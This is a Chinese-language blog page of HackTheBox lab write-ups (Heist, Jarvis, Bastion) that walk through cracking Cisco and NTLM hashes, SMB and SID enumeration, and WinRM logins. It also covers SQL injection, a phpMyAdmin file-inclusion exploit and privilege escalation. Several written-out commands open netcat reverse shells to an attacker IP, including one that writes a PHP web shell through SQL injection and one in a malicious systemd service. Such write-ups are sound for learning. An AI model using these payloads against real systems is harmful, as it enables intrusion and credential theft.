router bgp 100
 synchronization
 bgp log-neighbor-changes
 bgp dampening
 network 192.168.0.0Â mask 300.255.255.0
 timers bgp 3 9
 redistribute connected
!
ip classless
ip route 0.0.0.0 0.0.0.0 192.168.0.1
!
!
access-list 101 permit ip any any
dialer-list 1 protocol ip list 101
!
no ip http server
no ip http secure-server
!
line vty 0 4
 session-timeout 600
 authorization exec SSH
 transport input ssh
1234567891011121314151617181920212223242526272829303132333435363738394041

其中有三行是包含哈希值的

enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91  // Type 5 
!
username rout3r password 7 0242114B0E143F015F5D1E161713 //Type 7 
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408 //type 7 
1234

按照之前所说的,这应该分别CISCO的哈希值。
分别为 type 5 跟 type 7。type 5是有salt过的。
利用网上的工具来进行破解。

在这里插入图片描述
Type 5 的比较麻烦,网上的工具没能找到密码。
找到一个 github脚本
在这里插入图片描述
现在我们已经找到全部的账号和密码

账号 密码
admin $uperP@ssword
rout3r Q4)sJu\Y8qz*A3?d
Hazard stealth1agent

三,拿到shell

尝试使用现有的账号和密码 来登陆网页,但提示需要用邮箱。利用了例子如 admin@heist.htb
也没有进展。

利用metasploit 的smblogin 来进行爆破。
在这里插入图片描述
发现只有 Hazrd:stealth1agent 可以登陆
发现权限都是No Access和READ。

root@xing# smbmap -H 10.10.10.149 -u hazard -p stealth1agent
[+] Finding open SMB ports....
[+] User SMB session establishd on 10.10.10.149...
[+] IP: 10.10.10.149:445        Name: 10.10.10.149                                      
        Disk                                                    Permissions
        ----                                                    -----------
        ADMIN$                                                  NO ACCESS
        C$                                                      NO ACCESS
        IPC$                                                    READ ONLY
123456789

IPC$(Internet Process Connection)是共享”命名管道”的资源,它是为了让进程间通信而开放的命名管道,通过提供可信任的用户名和口令,连接双方可以建立安全的通道并以此通道进行加密数据的交换,从而实现对远程计算机的访问。

在这里我们可以利用 READ ONLY 的IPC$来取得本地账号的信息。

利用rpclient来连接

rpcclient -U "Hazard%stealth1agent" heist.htb
1

在这里插入图片描述
我们也可以同样利用SID来获取用户名
sid的后四位是用户的编号,我们可以通过逐渐增加来找到本机的用户名字

lookupsids S-1-5-21-4254423774-1266059056-3197185112-1008
1

在这里插入图片描述
发现多三个用户为 Chase,support,Jason。

另外一个方法是用 impacket (好东西呀)。

root@xing:/opt# locate lookupsid.py
/usr/share/doc/python3-impacket/examples/lookupsid.py

root@xing:/opt# python /usr/share/doc/python3-impacket/examples/lookupsid.py Hazard:stealth1agent@10.10.10.149
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] Brute forcing SIDs at 10.10.10.149
[*] StringBinding ncacn_np:10.10.10.149[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-4254423774-1266059056-3197185112
500: SUPPORTDESK\Administrator (SidTypeUser)
501: SUPPORTDESK\Guest (SidTypeUser)
503: SUPPORTDESK\DefaultAccount (SidTypeUser)
504: SUPPORTDESK\WDAGUtilityAccount (SidTypeUser)
513: SUPPORTDESK\None (SidTypeGroup)
1008: SUPPORTDESK\Hazard (SidTypeUser)
1009: SUPPORTDESK\support (SidTypeUser)
1012: SUPPORTDESK\Chase (SidTypeUser)
1013: SUPPORTDESK\Jason (SidTypeUser)
123456789101112131415161718

尝试了各种组合还是无法登陆smb或者web。
于是决定再扫一遍nmap 看看有没有什么高端口是漏掉的。
发现了5985端口开着

WinRM 是windows 一种方便远程管理的服务;开启winrm service,便于在日常工作中,远程管理服务器,或通过脚本,同时管理多台服务器,来提高工作效率

在这里插入图片描述
这边可以利用一种工具叫evil-winrm 来进行登陆。

有兴趣的可以了解更多
Evil-winRM 远程管理shell

首先,利用metasploit 的 scanner/winrm/winrm_login 模块来爆破帐号和密码。
(这么多帐号和密码 到底哪个密码是哪个呀)。

把新取得的账号 全部保存进 possible_user。
然后根据lookupsid取得的 DOMAIN填写。

在这里插入图片描述

在这里插入图片描述

成功取得有效登陆

Chase:Q4)sJu\Y8qz*A3?d

利用evil-winrm 进行登陆

ruby evil-winrm.rb -i 10.10.10.149 -u Chase -p "Q4)sJu\Y8qz*A3?d"

在这里插入图片描述

四,提权

一番探索后 发现有 firefox 的程序再跑
在这里插入图片描述
利用微软的procdump把 firefox的日志

https://docs.microsoft.com/en-us/sysinternals/downloads/procdump

利用 evil-winrm 上传 procdump.exe 然后执行

upload proxdump.exe
procdump -ma 2892
12

后面用 grep 找出admin 后发现密码。
在这里插入图片描述
使用evil win-rm 登陆后 取到 root flag




root

hackthebox
hackthebox
Continue
HTB Jarvis Writeup

挺有意思的一台机器,有挺多种方式拿 low priv shell。

攻击机:官方Kali linux 2019 64位
作者:Ikonw

靶机介绍

a

一,端口扫描

只有HTTP 比较有兴趣,title 是 Stark Hotel

Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-22 11:48 +08
Nmap scan report for jarvis.htb (10.10.10.143)
Host is up (0.33s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 03:f3:4e:22:36:3e:3b:81:30:79:ed:49:67:65:16:67 (RSA)
|   256 25:d8:08:a8:4d:6d:e8:d2:f8:43:4a:2c:20:c8:5a:f6 (ECDSA)
|_  256 77:d4:ae:1f:b0:be:15:1f:f8:cd:c8:15:3a:c3:69:e1 (ED25519)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Stark Hotel
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
123456789101112131415161718

二,HTTP Enumeration

第一个习惯就是先把gobuster 上起来

gobuster dir -w directory-list-2.3-medium.txt -u 10.10.10.143 -t 50
1

a
发现有 phpmyadmin
经过一番尝试,default 账号和密码都无效。暂时先跳过。

继续浏览 stark hotel(钢铁侠爱好者,stark 和 jarvis)

在网页上发现几处可疑的域名

supersecurehotel.htb
logger.htb

a
尝试着加进去 /etc/hosts

10.10.10.143 jarvis.htb supersecurehotel@logger.htb supersecurehotel.htb logger.htb
1

然后分别用 jarvis.htb, supersecurehotel.htb, logger.htb 等域名进行访问。 结果还是跟之前一样的 并没有什么区别。我们接着探索。

一顿胡乱点击后 发现 room.php 有可疑
a
尝试加个双引号引号 

http://10.10.10.143/room.php?cod=1"
1

果然报错了
a
下一步 我们可以利用 ORDER BY 或者 UNION SELECT来找出查询语句有几个字段。

ORDER BY

首先使用orderby子句来确定SQL语句查询的字段数量。orderby子句会根据sql查询结果的字段来排序,如果字段不存在则会报错。

可以先从10 开始试

http://10.10.10.143/room.php?cod=1 ORDER BY 10
1

页面显示反常,代表没有10个字段, 一个一个慢慢下试
a
试到第7的时候 页面正常返回

http://10.10.10.143/room.php?cod=1 ORDER BY 7
1

确认了 有7个字段
紧接着 我们能使用 UNION SELECT来确定回显位

http://10.10.10.143/room.php?cod=999 UNION SELECT 1,2,3,4,5,6,7
1

可以确定 1 应该是ID,所以没有显示。
2 是 评分等级
3 是 价钱
4 是 介绍
5 是 图片
6 和 7 是未知。 当然这些都不重要 重要的是 回显位我们能看到。

a
可以利用mysql的一些函数来获取更多信息。 比如database()
数据库的名字叫hotel

http://10.10.10.143/room.php?cod=999 UNION SELECT 1,2,database(),4,5,6,7
1

a

三,拿shell

我们有两种方式来拿到 www-data。

一种为利用mysql读写的方式注入php执行nc

SELECT ... INTO OUTFILE 'file_name'
1
http://10.10.10.143/room.php?cod=999 UNION SELECT 1,2,'<?php system("nc -e /bin/bash 10.10.14.10 1234");?>',4,5,6,7 INTO OUTFILE '/var/www/html/malicious.php'
1

然后我们访问 10.10.10.143/malicious.php
成功拿到 shell
a

第二种方式是通过 mysql函数导出 数据库的用户名和密码 登陆phpmyadmin.

使用 group_concat 可以把 同一个分组中的值连接起来,返回一个字符串结果 利用 “:” 来隔离分开

room.php?cod=999 union select 1,2,(select group_concat(user,":",password,":",host) from mysql.user),4,5,6,7
1

我们成功取得 数据库的账号和密码哈希值

Dbadmin:2D2B7A5E4E637B8FBA1D17F40318F277D29964D0
a
利用 crackstation.net 来进行破解哈希值
img
得到密码 imissyou

找回之前的 phpmyadmin 登陆后发现
Apache/2.4.25
phpmyadmin 4.8.0
a
文章发表的时候 phpmyadmin 最新的版本为 5.0.1
一番searchsploit后发现 4.8.0和4.8.1 版本有远程执行文件包含漏洞

phpmyadmin 4.8 文件包含漏洞传送门

首先 运行sql命令

select '<?php system("nc -e /bin/bash 10.10.14.12 1234");?>'
1

a
拿到session的数值
a
然后进行访问

10.10.10.143/phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/sessions/sess_b6uigkomnmk4oaa91ckc4chk4nfahaqi
1

a
成功!

四,提高用户权限

第一件事情就是试试 sudo -l 有没有任何可以利用的权限。

Matching Defaults entries for www-data on jarvis:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on jarvis:
    (pepper : ALL) NOPASSWD: /var/www/Admin-Utilities/simpler.py

1234567

这是一个小型的警报器
a
仔细看了源代码,有一个地方可以使用命令注入,虽然做了点黑名单来过滤。 但是由于 $ 还能使用。 我们可以用类似 $(cmd) 的操作。

a

sudo -u pepper /var/www/Admin-Utilities/simpler.py -p
Enter an IP: $(bash)
12

我们成功拿到pepper的shell
这里不懂出于什么原因 我各种命令全部都没响应。于是我用nc 重新生成了一个shell
a

pepper@jarvis:/$nc -e /bin/bash 10.10.14.10 1234
nc -e /bin/bash 10.10.14.10 1234

123

于是我们成功拿到pepper 的权限
a

五,ROOT提权

首先我们来查看SUID files

find / -perm -4000 2>/dev/null
1

a发现 systemctl 比较可疑。
通过 gtfobins 发现存在SUID 来进行提权的方法。
a
一般看到这种我都比较喜欢手动操作。
创建一个 pwn.service 在 pepper 的主目录里 并且把 ExecStart 指向 nc.sh

[Service]
Type=oneshot
ExecStart=/home/pepper/nc.sh
[Install]
WantedBy=multi-user.target

123456
#!/bin/bash
nc -e /bin/bash 10.10.14.10 1234

123

然后我们要创建一个 symlink 起来

systemctl link /home/pepper/pwn.service
1

打开 nc 接听
a

然后启动我们的pwn服务

systemctl start pwn
1

我们成功拿到root
a




root

hackthebox
hackthebox
Continue
HTB Wall Writeup

这台机器比较有意思,正如名字 有一道“墙”。有趣的是这台机器的CMS CVE和机器的作者是同一个人。
作者尽量写出自己在遇到问题的时候碰到的坑 以及做了什么尝试和思路。

hackthebox
hackthebox
Continue
HTB Bastion Writeup

攻击机:官方Kali linux 2019 64位
作者: Ikonw

image-20200924210807049

一,端口扫描

image-20200924210826254

正常的nmap端口扫描 没有太多的资讯,只有SMB和SSH 开着。

二,SMB Enumeration

首先,利用smbclient 连接到靶机
方式有很多种, smbmap之类的 但我比较喜欢用简单的smbclient.
smbmap等其他工具在真实环境里 会自动进行大量操作,很容易被日志捕捉下来。

smbclient -L //10.10.10.134

image-20200924210848265

发现四个目标,其中三个是比较正常。
有意思的是 Backups

我们利用smbclient 看看是否允许我们连接到 Backups

smbclient \\\\10.10.10.134\\Backups

这里利用””来 逃脱 “” 所以需要4个,而backup 两个。

image-20200924210918572

asd

成功进入,发现三个文件。利用 getnote.txt 下载到本地。
大概的意思就是 系统管理员建议不要把整个backup 文件夹下载到本地。
按照文件夹的名字来看,应该是windows镜像的备份。

asdf

于是我尝试将整个backup都挂载到本地。
在本地创建文件夹 /mnt/backup

mount -t cifs //10.10.10.134/Backups /mnt/backup -o rw

挂载到本地并且允许读写操作

在这asd述

7z 有一个功能是可以让你直接读取 vhd文件的格式。我们直接来读取5gb的文件
(文件较大 大概2分钟左右, 文件较多就只展示一部分)

7z l 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd

在fdsaf

可以看到这是几乎整个windows的备份。
既然是windows备份 我们是不是可以从SAM File里面直接提取用户的帐号密码呢

三,用户帐号密码

7z 只是让我们看到了文件,而不能看到内容。
我稍微google 了一下,发现一个兄弟在medium上面有篇文章利用ghost-mount挂载虚拟硬盘。
linux的 ghostmount 能让我们进入虚拟硬盘的文件

链接: 文章地址

跟着大哥走
首先我们需要安装 libguestfs-tools这个库

apt-get install libguestfs-tools

简单的安装后,我们创建一个新的文件夹 /mnt/vhd

把vhd挂载在 这个文件夹

guestmount --add /mnt/backup/WindowsImageBackup/L4mpje-PC/Backup\ 2019-02-22\ 124351/9b9cfbc4-369e-11e9-a17c-806e6f6

在asdasd

可以看到已经可以进入到 vhd文件里进行操作。
我首先要做的就是能不能直接到user desktop里拿到 user.txt

samdump2可以完成这个任务

在这asdasd

关于哈希值的利用方法很多,既然SMB是开着的 完全可以用哈希值传递攻击 登录系统。
个人原因 我比较喜欢尝试破解密码

*disabled* Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
123

注意这边 administrator和 Guest显得的是 disable
正常来说格式是
<用户名>:<用户ID>:< LM hash>:< NT hash>:<留言>:<主目录>
Administrator和guest的 LM HASH和NT hash都是一模一样。
这边要注意 aad3 和 31d6 都是代表为空说明这里没有数值
题外话。

我们把L4mpje 的哈希值丢到crackstation.net 进行破解
得到帐号密码
L4mpje:bureaulampje

在这sadad

很可惜 我们没有 RDP, 但我们有SSH(狗头)

ssh L4mpje@10.10.10.134
password: bureaulampje
12

成功拿到 cmd shell
在这里插入图片描述
在这里插入图片描述
现在开始准备提权。
碰到windows 我个人习惯是上JAWL 的脚本来看系统的信息来帮助我提权。

链接: Jawl github地址

因为这是我的第一个文章 我就简单的说下 如何在windows里传输文件
其实方式有很多种,
有的情况这个可以 有的情况那个可以
我就简单说一下 我个人喜爱的一个方法。
powershell

powershell.exe -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.12/jaw
s-enum.ps1','C:\Users\L4mpje\Desktop\jaws-enum.ps1')
12

题外话结束

执行jaws-enum.ps1

powershell.exe -ExecutionPolicy Bypass -File .\jaws-enum.ps1
1

大概的看了下 并没有什么有趣的信息,但有一个地方引起了关注
mRemoteNG
在这里插入图片描述

四,提权

碰到陌生的软件就要上Google询问,果然我们发现了这软件存在比较弱的密码保护管理。
在这里插sad
在另外一篇文章里 我们发现了储存密码的目录 是位于Appdata里。

链接:文章传送门

asdf
这里再说点题外话。
Appdata属于隐藏的文件夹类型 正常的dir 是无法看见文件夹

sadfasdfaf

利用 dir/a 来显示全部的文件

asdf

成功找到管理员的密码

a

利用github上面的一个python 脚本 来算出密码

链接:github传送门

python3 mremote_decrypt.py -s "aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=="

成功取得密码
thXLHM96BeKL0ER2
1234

在这里插入图片描述

紧接着 SSH登陆管理员 并拿到root.txt

在这里插入图片描述




root

hackthebox
hackthebox
Continue
Home Archives Tags About Search